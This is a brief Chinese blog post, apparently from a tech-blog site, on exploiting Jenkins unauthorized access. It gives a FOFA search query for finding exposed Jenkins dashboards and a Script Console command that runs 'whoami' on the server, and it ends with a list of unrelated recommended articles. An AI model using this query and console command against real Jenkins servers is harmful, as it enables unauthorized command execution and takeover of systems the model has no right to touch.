Jenkins未授权访问漏洞

lhdbk______2024-08-08 12:59
5.Jenkins未授权访问漏洞

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

一、使用以下fofa语法进行产品搜索
复制代码 
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
二:在打开的URL中.点击 Manage Jenkins-->Scritp Console 在执行以下命令

println "whoami".execute().text

相关推荐
-凌凌漆-7 分钟前
【Vue】Vue3 vite build 之后空白
前端·javascript·vue.js
心柠7 分钟前
前端工程化
前端
沐雪架构师19 分钟前
核心组件2
前端
qq_3363139320 分钟前
javaweb-Vue3
前端·javascript·vue.js
小圣贤君25 分钟前
Electron 桌面应用接入通义万相:文生图从 0 到 1 实战
前端·electron·ai写作·通义万相·ai生图·写作软件·小说封面
南风知我意95731 分钟前
【前端面试1】基础JS的面试题
前端·javascript·面试
浩浩测试一下40 分钟前
应急响应之 洪水 Floods attack ==== DDOS
安全·web安全·网络安全·系统安全·ddos·安全架构
wjhx41 分钟前
在Qt Design Studio中进行页面切换
前端·javascript·qt
钱多多先森41 分钟前
【Dify】使用 python 调用 Dify 的 API 服务,查看“知识检索”返回内容,用于前端溯源展示
开发语言·前端·python·dify
霍理迪42 分钟前
JS—数组
开发语言·前端·javascript
热门推荐
01GitHub 镜像站点02【网络安全测试】Burp Suite工具使用说明、配置及常见问题(有关必回)03OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)04Claude Code Skills 实用使用手册05struts2 XML外部实体注入漏洞复现(CVE-2025-68493)06UV安装并设置国内源07在Trae中使用Pencil MCP08Open Code教程(四)| 高级配置与集成09在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)10AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南